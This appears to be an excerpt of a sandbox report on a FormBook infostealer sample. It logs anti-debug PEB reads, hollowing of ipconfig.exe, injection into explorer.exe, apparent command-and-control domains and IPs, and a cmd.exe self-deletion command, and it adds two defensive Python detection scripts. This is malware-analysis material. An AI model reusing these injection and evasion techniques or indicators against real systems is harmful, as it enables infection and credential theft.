          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code functions that load the PEB pointer from the TEB (mov eax, dword ptr fs:[00000030h]; in 13_2_02C56DC9 and 13_2_02BF4120 one of the loads goes to ecx instead), listed once per function with the number of such loads the sandbox recorded:
13_2_02C6C450 (2), 13_2_02C92073 (1), 13_2_02CA1074 (1), 13_2_02CA740D (3), 13_2_02C91C06 (14), 13_2_02C56C0A (4), 13_2_02BF746D (1), 13_2_02C57016 (3), 13_2_02CA4015 (2), 13_2_02C0BC2C (1), 13_2_02C0002D (5), 13_2_02BF0050 (2), 13_2_02C56DC9 (6), 13_2_02C9FDE2 (4), 13_2_02C641E8 (1), 13_2_02BD2D8A (5), 13_2_02C88DF1 (1), 13_2_02BFC182 (1), 13_2_02C02581 (4), 13_2_02C0A185 (1), 13_2_02C02990 (1), 13_2_02C0FD9B (2), 13_2_02BDB1E1 (3), 13_2_02BED5E0 (2), 13_2_02C061A0 (2), 13_2_02C035A1 (1), 13_2_02C569A6 (1), 13_2_02CA05AC (2), 13_2_02C01DB5 (3), 13_2_02C551BE (4), 13_2_02C13D43 (1), 13_2_02C53540 (1), 13_2_02BE3D34 (13), 13_2_02BDAD30 (1), 13_2_02BF4120 (5), 13_2_02BD9100 (3), 13_2_02BFC577 (2), 13_2_02BDB171 (2), 13_2_02BDC962 (1), 13_2_02BF7D50 (1), 13_2_02C9E539 (1), 13_2_02C5A537 (1), 13_2_02C0513A (2), 13_2_02BFB944 (2), 13_2_02C04D3B (3), 13_2_02CA8D34 (1)
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 3_2_0040ACF0 LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 2_2_001F14BB SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 2_2_001F14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 3_2_001F14BB SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 3_2_001F14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
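The fs:[00000030h] reads listed above are loads of the PEB pointer out of the 32-bit TEB (the hollowed ipconfig.exe is a WoW64 process, so the 32-bit PEB layout applies). On their own such loads are not a finding, since the loader and the CRT read the PEB as well; the sandbox counts them because the fields a FormBook payload consults for anti-analysis, BeingDebugged at PEB+0x02, NtGlobalFlag at PEB+0x68, NumberOfProcessors at PEB+0x64 and the Ldr list at PEB+0x0C, are reached through exactly such a load followed by a short displacement dereference, which is what the "evasive API chain" and IsDebuggerPresent-style signatures on this page describe. The following Python is an added example and is not part of the Joe Sandbox report or of the sample's code: it scans a code blob for the x86 encodings of these PEB loads and classifies each by the PEB field dereferenced within the next few bytes. The byte string it scans is constructed for the example; the instruction encodings and PEB offsets are the standard 32-bit ones.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# 32-bit PEB fields commonly read for anti-analysis, keyed by offset.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x64: "NumberOfProcessors", 0x68: "NtGlobalFlag"}
REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Loads of the PEB pointer through the TEB at fs:[0x30]:
#   64 A1 30 00 00 00      mov eax, dword ptr fs:[30h]   (short moffs32 form)
#   64 8B /r 30 00 00 00   mov r32, dword ptr fs:[30h]   (ModRM mod=00 rm=101 -> disp32)
PEB_LOAD = re.compile(rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")

# Dereference forms that take [base + disp8]: (opcode bytes, total instruction length).
#   0F B6 /r disp8     movzx r32, byte ptr [base+disp8]
#   8B /r disp8        mov   r32, dword ptr [base+disp8]
#   80 /7 disp8 imm8   cmp   byte ptr [base+disp8], imm8
#   F6 /0 disp8 imm8   test  byte ptr [base+disp8], imm8
DEREF_FORMS = [(b"\x0f\xb6", 4), (b"\x8b", 3), (b"\x80", 4), (b"\xf6", 4)]


class PebAccess(NamedTuple):
    offset: int            # offset of the fs:[30h] load in the blob
    register: str          # register that receives the PEB pointer
    field: Optional[str]   # PEB field dereferenced shortly after, if recognised


def _deref_field(window: bytes, base: int) -> Optional[str]:
    """Return the first [base+disp8] dereference in window whose disp8 is a known PEB field."""
    for i in range(len(window)):
        for opcode, length in DEREF_FORMS:
            if window.startswith(opcode, i) and i + length <= len(window):
                modrm = window[i + len(opcode)]
                disp8 = window[i + len(opcode) + 1]
                # mod=01 (disp8 follows) and rm=base; the reg field is left free.
                if (modrm & 0xC7) == (0x40 | base) and disp8 in PEB_FIELDS:
                    return PEB_FIELDS[disp8]
    return None


def find_peb_accesses(code: bytes, window: int = 16) -> List[PebAccess]:
    """Locate every fs:[30h] load and classify it by the PEB field read right after it."""
    hits = []
    for m in PEB_LOAD.finditer(code):
        enc = m.group(0)
        reg = 0 if enc[1] == 0xA1 else (enc[2] >> 3) & 7   # A1 form is always eax
        field = _deref_field(code[m.end():m.end() + window], reg)
        hits.append(PebAccess(m.start(), REG_NAMES[reg], field))
    return hits


def summarize(hits: List[PebAccess]) -> Dict[str, int]:
    """Count accesses per recognised PEB field ('unclassified' for the rest)."""
    counts: Dict[str, int] = {}
    for h in hits:
        key = h.field or "unclassified"
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed code blob (not taken from the sample): three anti-analysis checks
# followed by a PEB load with no interesting dereference after it.
SAMPLE_CODE = bytes.fromhex(
    "64A130000000" "0FB64002" "85C0" "7505"     # mov eax,fs:[30h]; movzx eax,[eax+2]; test eax,eax; jne
    "648B0D30000000" "8B4164" "83F802"          # mov ecx,fs:[30h]; mov eax,[ecx+64h]; cmp eax,2
    "64A130000000" "8B4068" "A970000000"        # mov eax,fs:[30h]; mov eax,[eax+68h]; test eax,70h
    "64A130000000" "C3"                         # mov eax,fs:[30h]; ret
)

if __name__ == "__main__":
    hits = find_peb_accesses(SAMPLE_CODE)
    for hit in hits:
        print(f"{hit.offset:#06x}: PEB -> {hit.register}, field {hit.field or '?'}")
    print(summarize(hits))
```

Run against a dumped code section (for instance the UNPACKEDPE artefacts listed under the Yara matches), the per-field summary is what distinguishes a handful of benign loader reads from a block of checks on BeingDebugged, NtGlobalFlag and NumberOfProcessors; a single function such as 13_2_02C91C06 above, with fourteen PEB loads, is worth opening in a disassembler regardless.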

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Domain query: www.dawonderer.com
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.147 80
Source: C:\Windows\explorer.exe | Domain query: www.bolacorner.com
Source: C:\Windows\explorer.exe | Network Connect: 52.71.57.184 80
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 160000
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Memory written: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3968
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Process created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
Source: explorer.exe, 00000006.00000000.297613941.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.405442294.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.341373691.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000006.00000000.333653859.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.350435148.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.341667901.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.405844896.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.341667901.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.405844896.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.405534885.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.297624532.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.341397222.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000006.00000000.298182545.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.341667901.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.405844896.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 2_2_001EFE73 cpuid
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 2_2_001F0FE8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
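Read as a sequence, the entries above are the classic FormBook injection chain: the dropper writes a PE (value starts with 4D5A) into the image base of a second copy of itself, unmaps the image of a suspended ipconfig.exe at its base address 160000 and maps an execute/read/write section in its place (process hollowing), queues an APC into explorer.exe and sets a thread context in the target process, and the hollowed ipconfig.exe finally deletes the dropper with cmd.exe /c del. Any one of these events also occurs in benign software; the verdict comes from correlating them per source/target pair. The following Python is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it groups such events by (source, target) and labels each pair. The event list is constructed to mirror the entries above; where the report prints the thread-context target only as PID 3968, the constructed data assumes that PID is explorer.exe (an assumption, not something the page states).

```python
import ntpath
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set, Tuple


class Event(NamedTuple):
    source: str   # process that performed the action
    action: str   # sandbox action label
    detail: str   # free-text detail as the report prints it


WIN_PATH = re.compile(r'[A-Za-z]:\\[^"\s]+')
SELF_DEL = re.compile(r'/c\s+del\s+"?([A-Za-z]:\\[^"]+)"?', re.IGNORECASE)

DROPPER = r"C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
IPCONFIG = r"C:\Windows\SysWOW64\ipconfig.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events modelled on the report's HIPS/OS-evasion entries. The report gives
# the thread-context target as PID 3968; it is assumed here to resolve to explorer.exe.
SAMPLE_EVENTS = [
    Event(DROPPER, "Section unmapped", IPCONFIG + " base address: 160000"),
    Event(DROPPER, "Section loaded", "unknown target: " + EXPLORER + " protection: execute and read and write"),
    Event(DROPPER, "Section loaded", "unknown target: " + IPCONFIG + " protection: execute and read and write"),
    Event(IPCONFIG, "Section loaded", "unknown target: " + EXPLORER + " protection: read write"),
    Event(IPCONFIG, "Section loaded", "unknown target: " + EXPLORER + " protection: execute and read and write"),
    Event(DROPPER, "Memory written", DROPPER + " base: 400000 value starts with: 4D5A"),
    Event(DROPPER, "Thread APC queued", "target process: " + EXPLORER),
    Event(DROPPER, "Thread register set", "target process: " + EXPLORER),
    Event(IPCONFIG, "Thread register set", "target process: " + EXPLORER),
    Event(DROPPER, "Process created", DROPPER + " " + DROPPER + r" C:\Users\user\AppData\Local\Temp\pvrclmgpss"),
    Event(IPCONFIG, "Process created", r'C:\Windows\SysWOW64\cmd.exe /c del "' + DROPPER + '"'),
]


def _target(ev: Event) -> str:
    """The first Windows path in the detail column is the target of the action."""
    m = WIN_PATH.search(ev.detail)
    return m.group(0) if m else ""


def _classify(flags: Set[str]) -> str:
    # Unmapping the target's image and remapping executable memory is hollowing,
    # whichever mechanism later transfers execution.
    if "unmapped" in flags and "rwx" in flags:
        return "process hollowing"
    if "rwx" in flags and "apc" in flags:
        return "APC injection"
    if "rwx" in flags and "ctx" in flags:
        return "thread-context injection"
    if "mz" in flags:
        return "PE image written into target"
    return "suspicious cross-process memory access"


def analyze(events: List[Event]) -> Tuple[Dict[Tuple[str, str], str], List[Tuple[str, str]]]:
    """Return a verdict per (source, target) image name and any self-deletion of a chain member."""
    flags: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    actors = {ev.source for ev in events}
    deletions: List[Tuple[str, str]] = []
    for ev in events:
        key = (ntpath.basename(ev.source), ntpath.basename(_target(ev)))
        if ev.action == "Section unmapped":
            flags[key].add("unmapped")
        elif ev.action == "Section loaded" and "execute" in ev.detail:
            flags[key].add("rwx")          # a plain read/write mapping is not counted
        elif ev.action == "Memory written" and "4D5A" in ev.detail:
            flags[key].add("mz")           # an MZ header landed in the target
        elif ev.action == "Thread register set":
            flags[key].add("ctx")
        elif ev.action == "Thread APC queued":
            flags[key].add("apc")
        elif ev.action == "Process created":
            m = SELF_DEL.search(ev.detail)
            if m and m.group(1) in actors:  # a chain member deletes another chain member
                deletions.append((ntpath.basename(ev.source), m.group(1)))
    return {k: _classify(v) for k, v in flags.items()}, deletions


if __name__ == "__main__":
    verdicts, deletions = analyze(SAMPLE_EVENTS)
    for (src, dst), verdict in verdicts.items():
        print(f"{src} -> {dst}: {verdict}")
    for src, path in deletions:
        print(f"{src} deleted {path} via cmd.exe")
```

The same grouping works on Sysmon or ETW data once the events are normalised to the three columns: image-base unmapping is visible as NtUnmapViewOfSection on a foreign handle, the executable mapping as a section object mapped into the target, and the MZ write as a WriteProcessMemory whose first bytes are 4D 5A.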

          Stealing of Sensitive Information

Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 12 Native API | Path Interception | 612 Process Injection | 1 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 Virtualization/Sandbox Evasion | 1 Input Capture | 251 Security Software Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 612 Process Injection | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
